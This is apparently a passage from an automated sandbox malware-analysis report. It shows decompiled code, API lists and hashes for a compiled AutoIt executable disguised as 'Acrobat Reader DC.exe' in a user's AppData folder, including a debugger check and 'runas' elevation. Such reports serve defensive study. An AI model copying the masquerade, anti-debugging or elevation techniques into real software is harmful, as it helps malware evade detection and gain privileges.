                                  					_t60 =  *0x4a90e8; // 0x1
                                  					_t57 =  *0x4a90e9; // 0x0
                                  					_t69 =  &_v1084;
                                  					 *0x4a7f58 = _t60;
                                  					GetFullPathNameW("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104,  &_v1084, 0x4a7f50);
                                  					goto L5;
                                  				}
                                  			}






















                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32 ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32 ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: _memset.LIBCMT ref: 0040E0E2
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2493088469-2808984075
                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0040E500(intOrPtr* __edi, void* __eflags) {
                                  				void* _v8;
                                  				struct HINSTANCE__* _v12;
                                  				struct HINSTANCE__* _v20;
                                  				struct HINSTANCE__* _v24;
                                  				struct HINSTANCE__* _v32;
                                  				struct _SYSTEM_INFO _v68;
                                  				char _v70;
                                  				signed char _v72;
                                  				struct _OSVERSIONINFOW _v352;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* _t85;
                                  				char _t86;
                                  				struct HINSTANCE__* _t92;
                                  				struct HINSTANCE__* _t97;
                                  				intOrPtr* _t99;
                                  				char _t105;
                                  				intOrPtr* _t115;
                                  
                                  				_t115 = __edi;
                                  				_t116 = __edi + 0xc;
                                  				E0040BC70(__edi + 0xc, __eflags);
                                  				 *((char*)(__edi + 0x30)) = 0;
                                  				_v352.dwOSVersionInfoSize = 0x11c;
                                  				GetVersionExW( &_v352);
                                  				 *((intOrPtr*)(__edi + 8)) = _v352.dwBuildNumber;
                                  				 *__edi = _v352.dwMajorVersion;
                                  				 *((intOrPtr*)(__edi + 4)) = _v352.dwMinorVersion;
                                  				E00402160(__edi + 0xc,  &(_v352.szCSDVersion), _v352.dwMinorVersion, __edi);
                                  				E0040E660(_t116);
                                  				E0040E680(0x485330, _t116);
                                  				_t85 =  *__edi - 5;
                                  				 *((char*)(__edi + 0x2c)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x1c)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x20)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x24)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x28)) = 0;
                                  				if(_t85 == 0) {
                                  					_t86 =  *((intOrPtr*)(__edi + 4));
                                  					__eflags = _t86;
                                  					if(_t86 != 0) {
                                  						__eflags = _t86 - 1;
                                  						if(_t86 != 1) {
                                  							__eflags = _t86 - 2;
                                  							if(_t86 == 2) {
                                  								__eflags = _v70 - 1;
                                  								 *((char*)(__edi + 0x1d)) = 1;
                                  								 *((char*)(__edi + 0x1f)) = 1;
                                  								 *((char*)(__edi + 0x21)) = 1;
                                  								if(_v70 != 1) {
                                  									 *((char*)(__edi + 0x20)) = 1;
                                  								} else {
                                  									 *((char*)(__edi + 0x1e)) = 1;
                                  								}
                                  							}
                                  						} else {
                                  							 *((char*)(__edi + 0x1d)) = _t86;
                                  							 *((short*)(__edi + 0x1e)) = 0x101;
                                  						}
                                  					} else {
                                  						 *((short*)(__edi + 0x1c)) = 0x101;
                                  					}
                                  					 *((char*)(_t115 + 0x30)) = (_v72 & 0x000000ff) >> 0x00000006 & 0x00000001;
                                  				} else {
                                  					if(_t85 == 1) {
                                  						_t105 =  *((intOrPtr*)(__edi + 4));
                                  						 *((char*)(__edi + 0x1d)) = 1;
                                  						 *((char*)(__edi + 0x1f)) = 1;
                                  						 *((char*)(__edi + 0x21)) = 1;
                                  						if(_t105 == 0) {
                                  							__eflags = _v70 - 1;
                                  							if(_v70 != 1) {
                                  								 *((char*)(__edi + 0x23)) = 1;
                                  								 *((short*)(__edi + 0x24)) = 0x101;
                                  							} else {
                                  								 *((short*)(__edi + 0x22)) = 0x101;
                                  							}
                                  						} else {
                                  							if(_t105 != 1) {
                                  								__eflags = _t105 - 2;
                                  								if(_t105 == 2) {
                                  									 *((short*)(__edi + 0x2a)) = 0x101;
                                  									 *((char*)(__edi + 0x29)) = 1;
                                  									 *((char*)(__edi + 0x27)) = 1;
                                  									 *((char*)(__edi + 0x23)) = 1;
                                  								}
                                  							} else {
                                  								 *((char*)(__edi + 0x23)) = _t105;
                                  								 *((char*)(__edi + 0x25)) = _t105;
                                  								if(_v70 != _t105) {
                                  									 *((char*)(__edi + 0x27)) = 1;
                                  									 *((short*)(__edi + 0x28)) = 0x101;
                                  								} else {
                                  									 *((short*)(__edi + 0x26)) = 0x101;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				_v20 = 0;
                                  				_v12 = 0;
                                  				E0040EF60( &_v20);
                                  				_t127 = _v12;
                                  				if(_v12 != 0) {
                                  					_push( &_v8);
                                  					_v8 = 0;
                                  					_push(GetCurrentProcess());
                                  					 *((intOrPtr*)(E0040EF20( &_v20, _t127)))();
                                  					if(_v8 == 1) {
                                  						 *((char*)(_t115 + 0x2c)) = 1;
                                  					}
                                  				}
                                  				_v68.dwOemId = 0;
                                  				_v68.dwPageSize = 0;
                                  				_v68.lpMinimumApplicationAddress = 0;
                                  				_v68.lpMaximumApplicationAddress = 0;
                                  				_v68.dwActiveProcessorMask = 0;
                                  				_v68.dwNumberOfProcessors = 0;
                                  				_v68.dwProcessorType = 0;
                                  				_v68.dwAllocationGranularity = 0;
                                  				_v68.wProcessorLevel = 0;
                                  				if( *((intOrPtr*)(_t115 + 0x2c)) == 0) {
                                  					GetSystemInfo( &_v68);
                                  				} else {
                                  					_v32 = 0;
                                  					_v24 = 0;
                                  					E0040EFD0( &_v32);
                                  					_t130 = _v24;
                                  					if(_v24 == 0) {
                                  						GetSystemInfo( &_v68);
                                  					} else {
                                  						_t99 = E0040EF90( &_v32, _t130); // executed
                                  						 *_t99( &_v68); // executed
                                  					}
                                  					_t97 = _v32;
                                  					if(_t97 != 0) {
                                  						FreeLibrary(_t97);
                                  					}
                                  				}
                                  				_t92 = _v20;
                                  				 *((short*)(_t115 + 0x2e)) = _v68.dwOemId;
                                  				if(_t92 != 0) {
                                  					FreeLibrary(_t92);
                                  				}
                                  				return _t115;
                                  			}

                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EBD0(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("uxtheme.dll"); // executed
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "IsThemeActive");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E004091E0(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
                                  				struct tagMSG _v32;
                                  				char _v48;
                                  				char _v64;
                                  				char _v80;
                                  				char _v96;
                                  				char _v100;
                                  				char _v104;
                                  				char _v108;
                                  				char _v112;
                                  				char _v116;
                                  				char _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				intOrPtr _v152;
                                  				int _v156;
                                  				char _v164;
                                  				struct tagMSG _v188;
                                  				struct HWND__* _v192;
                                  				int _v196;
                                  				struct HWND__* _v204;
                                  				char _v208;
                                  				struct HWND__* _v220;
                                  				struct tagMSG _v244;
                                  				char _v248;
                                  				char _v252;
                                  				long _v256;
                                  				long _v260;
                                  				struct HWND__* _v264;
                                  				int _v268;
                                  				struct HWND__* _v272;
                                  				signed int _v276;
                                  				char _v277;
                                  				char _v288;
                                  				int _v292;
                                  				struct HWND__* _v300;
                                  				struct HWND__* _v304;
                                  				struct HWND__* _v308;
                                  				struct tagMSG* _v312;
                                  				char _v316;
                                  				long _v324;
                                  				signed int _v328;
                                  				char _v329;
                                  				struct HWND__* _v332;
                                  				struct tagMSG* _v336;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int __esi;
                                  				intOrPtr _t280;
                                  				int _t282;
                                  				intOrPtr _t283;
                                  				struct tagMSG* _t285;
                                  				struct HWND__* _t291;
                                  				struct HWND__* _t295;
                                  				intOrPtr* _t297;
                                  				struct HWND__* _t299;
                                  				struct HWND__* _t302;
                                  				struct HWND__* _t307;
                                  				struct HWND__* _t329;
                                  				struct HWND__* _t331;
                                  				struct HWND__* _t336;
                                  				struct HWND__* _t337;
                                  				struct HWND__* _t338;
                                  				struct HWND__* _t342;
                                  				struct HWND__* _t347;
                                  				void* _t349;
                                  				struct HWND__* _t355;
                                  				struct tagMSG* _t358;
                                  				long _t359;
                                  				void* _t368;
                                  				void* _t379;
                                  				void* _t380;
                                  				struct tagMSG* _t384;
                                  				signed int _t385;
                                  				void* _t400;
                                  				signed int _t403;
                                  				void* _t405;
                                  				int _t406;
                                  				void* _t407;
                                  				struct HWND__* _t414;
                                  				int _t415;
                                  				struct HWND__* _t417;
                                  				struct HWND__* _t423;
                                  				intOrPtr _t431;
                                  				struct HWND__* _t437;
                                  				struct HWND__* _t442;
                                  				intOrPtr _t460;
                                  				void* _t462;
                                  				struct tagMSG* _t467;
                                  				signed int _t480;
                                  				struct tagMSG* _t511;
                                  				signed int _t545;
                                  				void* _t549;
                                  				struct tagMSG** _t552;
                                  				struct HWND__** _t553;
                                  				struct tagMSG* _t560;
                                  				struct HWND__* _t564;
                                  				struct HWND__* _t565;
                                  				signed int _t566;
                                  				signed int _t570;
                                  				struct HWND__** _t572;
                                  				void* _t598;
                                  
                                  				_t606 = __fp0;
                                  				_t511 = __edx;
                                  				_t471 = __ecx;
                                  				_t572 = (_t570 & 0xfffffff8) - 0x14c;
                                  				_t533 = __ecx;
                                  				_t280 =  *((intOrPtr*)(__ecx + 0xec));
                                  				if(_t280 >= 0xf3c) {
                                  					 *0x4974e2 = 0;
                                  					E0045E737(__fp0, __ecx, 0x9a, 0xffffffff);
                                  					_t282 = 1;
                                  					L33:
                                  					return _t282;
                                  				}
                                  				_t283 = _t280 + 1;
                                  				_v312 = __ecx;
                                  				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
                                  				if(_t283 == 1) {
                                  					E00410940(__ecx, __fp0);
                                  				}
                                  				_t533[0x51] = 0;
                                  				if(_t533[0x3f] != 0) {
                                  					L30:
                                  					_t285 = _t533[0x3b];
                                  					_t533[0x51] = 0;
                                  					if(_t285 == 1) {
                                  						E0040F190(_t471, _t533);
                                  						__eflags = _t533[0x3f] - 1;
                                  						if(__eflags == 0) {
                                  							goto L32;
                                  						}
                                  						E00401A50(_t533, _t511, __eflags, _t606);
                                  						LockWindowUpdate(0);
                                  						DestroyWindow( *0x497518); // executed
                                  						_t291 = GetMessageW( &_v32, 0, 0, 0);
                                  						__eflags = _t291;
                                  						if(_t291 <= 0) {
                                  							goto L32;
                                  						}
                                  						do {
                                  							TranslateMessage( &_v32);
                                  							DispatchMessageW( &_v32);
                                  							_t295 = GetMessageW( &_v32, 0, 0, 0);
                                  							__eflags = _t295;
                                  						} while (_t295 > 0);
                                  						goto L32;
                                  					} else {
                                  						_t533[0x3b] = _t285 - 1;
                                  						L32:
                                  						_t282 = 0;
                                  						goto L33;
                                  					}
                                  				} else {
                                  					while(_t533[0x51] == 0) {
                                  						if( *0x4974e3 != 0) {
                                  							L10:
                                  							if( *0x4a8624 != 0) {
                                  								_t297 =  *0x4a8628; // 0x0
                                  								_t460 =  *_t297;
                                  								E00431D7F();
                                  								_t299 = _t533[0x6c];
                                  								_t545 = 0;
                                  								__eflags = _t299;
                                  								if(_t299 == 0) {
                                  									L80:
                                  									__eflags = _t545 - _t299;
                                  									if(__eflags == 0) {
                                  										goto L11;
                                  									}
                                  									E00465124( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
                                  									_t511 = _t533[0x6b];
                                  									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
                                  									_v276 =  &(_v276->i);
                                  									E0040E0A0( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
                                  									E0047D33E( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
                                  									L29:
                                  									if(_t533[0x3f] == 0) {
                                  										continue;
                                  									}
                                  									goto L30;
                                  								}
                                  								_t471 = _t533[0x6b];
                                  								do {
                                  									_t511 = _t471->hwnd;
                                  									__eflags = _t511->hwnd;
                                  									if(_t511->hwnd == 0) {
                                  										goto L79;
                                  									}
                                  									_t511 = _t511->hwnd;
                                  									__eflags = _t511->hwnd - _t460;
                                  									if(_t511->hwnd == _t460) {
                                  										goto L80;
                                  									}
                                  									L79:
                                  									_t545 = _t545 + 1;
                                  									_t471 =  &(_t471->message);
                                  									__eflags = _t545 - _t533[0x6c];
                                  								} while (_t545 < _t533[0x6c]);
                                  								goto L80;
                                  							}
                                  							L11:
                                  							if( *0x4974ec == 1) {
                                  								__eflags =  *0x4974e3;
                                  								if( *0x4974e3 != 0) {
                                  									goto L12;
                                  								}
                                  								Sleep(0xa);
                                  								goto L29;
                                  							}
                                  							L12:
                                  							if(_t533[0x118] != 0) {
                                  								__eflags =  *0x4a954c;
                                  								if( *0x4a954c != 0) {
                                  									goto L13;
                                  								}
                                  								_t467 = _t533[0x116];
                                  								 *0x4a954c = 1;
                                  								_v308 = 0;
                                  								_v328 = _t467;
                                  								while(1) {
                                  									_t511 =  &_v328;
                                  									 *_t572 = 0;
                                  									_t329 = E00442A55(_t511, _t471);
                                  									__eflags = _t329;
                                  									if(_t329 == 0) {
                                  										goto L93;
                                  									}
                                  									_t347 = _t467->hwnd;
                                  									__eflags =  *((char*)(_t347 + 0x11));
                                  									if( *((char*)(_t347 + 0x11)) != 0) {
                                  										L92:
                                  										_t471 =  &_v324;
                                  										E00440847( &_v328,  &_v324);
                                  										_t467 = _v336;
                                  										continue;
                                  									}
                                  									_v324 = _t347;
                                  									_t349 = E0040C620( *((intOrPtr*)(_t347 + 0x14)));
                                  									__eflags = _t511;
                                  									if(__eflags < 0) {
                                  										goto L92;
                                  									}
                                  									if(__eflags > 0) {
                                  										L91:
                                  										_v308 =  &(_v308->i);
                                  										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
                                  										E00465124(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
                                  										_t355 =  &(_v272->i);
                                  										__eflags = _t355;
                                  										_v272 = _t355;
                                  										 *((char*)(_t467->hwnd + 0x10)) = 1;
                                  										E0047D33E(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
                                  										 *((char*)(_t467->hwnd + 0x10)) = 0;
                                  										goto L92;
                                  									}
                                  									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
                                  									if(__eflags < 0) {
                                  										goto L92;
                                  									}
                                  									goto L91;
                                  								}
                                  								while(1) {
                                  									L93:
                                  									_v328 = _t533[0x116];
                                  									while(1) {
                                  										L94:
                                  										_t471 =  &_v328;
                                  										 *_t572 = 0;
                                  										_t331 = E00442A55( &_v328,  &_v328);
                                  										__eflags = _t331;
                                  										if(_t331 == 0) {
                                  											break;
                                  										}
                                  										_t511 = _v328;
                                  										_t342 = _t511->hwnd;
                                  										__eflags =  *((char*)(_t342 + 0x11));
                                  										if( *((char*)(_t342 + 0x11)) != 0) {
                                  											E004521B3( &(_t533[0x116]),  &_v328);
                                  											L93:
                                  											_v328 = _t533[0x116];
                                  											continue;
                                  										}
                                  										_t471 =  &_v324;
                                  										_t511 =  &_v328;
                                  										E00440847(_t511,  &_v324);
                                  									}
                                  									__eflags = _v308;
                                  									 *0x4a954c = 0;
                                  									if(_v308 > 0) {
                                  										goto L29;
                                  									}
                                  									goto L13;
                                  								}
                                  							}
                                  							L13:
                                  							if( *0x4a863c != 0) {
                                  								__eflags = _t533[0x119] - 1;
                                  								if(_t533[0x119] == 1) {
                                  									goto L14;
                                  								}
                                  								__eflags =  *0x4a8668 - 1;
                                  								if( *0x4a8668 == 1) {
                                  									goto L14;
                                  								}
                                  								E0044C29D( &_v244);
                                  								while(1) {
                                  									_t511 =  &_v244;
                                  									_t302 = E0045178A(0x4a8630, _t511);
                                  									__eflags = _t302;
                                  									if(_t302 == 0) {
                                  										break;
                                  									}
                                  									__eflags = E00436565( &(_v244.message));
                                  									if(__eflags != 0) {
                                  										continue;
                                  									}
                                  									_t307 = E00465124( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
                                  									__eflags = _t307;
                                  									if(_t307 == 0) {
                                  										continue;
                                  									}
                                  									_v300 = 0;
                                  									_v292 = 1;
                                  									_v288 = 0;
                                  									E00408F40(1,  &_v300);
                                  									_v292 = 1;
                                  									_v300 = _v244.hwnd;
                                  									E00401B10(L"@GUI_CTRLID",  &_v96, __eflags);
                                  									E00401980(2, 1,  &_v300,  &_v96);
                                  									E00402250( &_v96);
                                  									E00408F40(L"@GUI_CTRLID",  &_v300);
                                  									_v292 = 7;
                                  									_v300 = _v244.pt;
                                  									E00401B10(L"@GUI_WINHANDLE",  &_v64, __eflags);
                                  									E00401980(2, 1,  &_v300,  &_v64);
                                  									E00402250( &_v64);
                                  									E00408F40(L"@GUI_WINHANDLE",  &_v300);
                                  									_t536 = L"@GUI_CTRLHANDLE";
                                  									_t559 =  &_v48;
                                  									_v292 = 7;
                                  									_v300 = _v220;
                                  									E00401B10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
                                  									_t511 =  &_v300;
                                  									E00401980(2, 1, _t511,  &_v48);
                                  									E00402250( &_v48);
                                  									_t560 = _v312;
                                  									 *((char*)(_t560 + 0x464)) = 1;
                                  									E0047D33E(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
                                  									 *((char*)(_t560 + 0x464)) = 0;
                                  									_t553 =  &_v316;
                                  									L108:
                                  									E00408F40(_t536, _t553);
                                  									_t471 =  &(_v244.message);
                                  									E00402250( &(_v244.message));
                                  									_t533 = _v312;
                                  									goto L29;
                                  								}
                                  								_t471 =  &(_v244.message);
                                  								E00402250( &(_v244.message));
                                  							}
                                  							L14:
                                  							if(E004091B0(_t511, _t606, _t533) == 1) {
                                  								goto L29;
                                  							}
                                  							if( *0x4a87b0 != 0) {
                                  								__eflags = _t533[0x119] - 1;
                                  								if(_t533[0x119] == 1) {
                                  									goto L16;
                                  								}
                                  								E0044C29D( &_v244);
                                  								while(1) {
                                  									_t511 =  &_v244;
                                  									_t437 = E00453BC6(0x4a8710, _t511);
                                  									__eflags = _t437;
                                  									if(_t437 == 0) {
                                  										break;
                                  									}
                                  									__eflags = E00436565( &(_v244.message));
                                  									if(__eflags != 0) {
                                  										continue;
                                  									}
                                  									_t442 = E00465124( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
                                  									__eflags = _t442;
                                  									if(_t442 == 0) {
                                  										continue;
                                  									}
                                  									_v204 = 0;
                                  									_v196 = 1;
                                  									_v192 = 0;
                                  									E00408F40(1,  &_v204);
                                  									_v196 = 1;
                                  									_t536 = L"@TRAY_ID";
                                  									_v204 = _v244.hwnd;
                                  									E00401B10(L"@TRAY_ID",  &_v80, __eflags);
                                  									_t511 =  &_v204;
                                  									E00401980(2, 1, _t511,  &_v80);
                                  									E00402250( &_v80);
                                  									_t552 = _v312;
                                  									__eflags = _v188.pt + 1;
                                  									_t552[0x119] = 1;
                                  									E0047D33E(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
                                  									_t552[0x119] = 0;
                                  									_t553 =  &_v220;
                                  									goto L108;
                                  								}
                                  								_t471 =  &(_v244.message);
                                  								E00402250( &(_v244.message));
                                  							}
                                  							L16:
                                  							_t358 = _t533[0x3e];
                                  							if(_t358 == 7) {
                                  								_t511 = _t533[0x114];
                                  								_t359 = WaitForSingleObject(_t511, 0xa);
                                  								_v256 = _t359;
                                  								__eflags = _t359 - 0x102;
                                  								if(_t359 != 0x102) {
                                  									GetExitCodeProcess(_t533[0x114],  &_v256);
                                  									_t511 = _t533[0x114];
                                  									CloseHandle(_t511);
                                  									_v324 = _v256;
                                  									_t471 = _t533 +  *_t533->message;
                                  									E0040D410( &_v324, _t533 +  *_t533->message);
                                  									_t533[0x51] = 1;
                                  									_t533[0x3e] = 0;
                                  								}
                                  								goto L29;
                                  							}
                                  							if(_t358 == 8 || _t358 == 9) {
                                  								Sleep(0xa);
                                  								__eflags = _t533[0x112];
                                  								if(_t533[0x112] == 0) {
                                  									__eflags = 0;
                                  									L127:
                                  									_t511 = _t533[0x10e];
                                  									_t471 =  &_v304;
                                  									E00443D19(_t511,  &_v304,  &_v329);
                                  									_t572 =  &(_t572[3]);
                                  									__eflags = _t533[0x3e] - 9;
                                  									if(_t533[0x3e] != 9) {
                                  										__eflags = _v329 - 1;
                                  										if(_v329 != 1) {
                                  											goto L29;
                                  										}
                                  										_t462 = 0;
                                  										__eflags = 0;
                                  										L133:
                                  										_t368 = _t533[0x115];
                                  										_v260 = 0xcccccccc;
                                  										__eflags = _t368 - _t462;
                                  										if(_t368 != _t462) {
                                  											GetExitCodeProcess(_t368,  &_v260);
                                  											CloseHandle(_t533[0x115]);
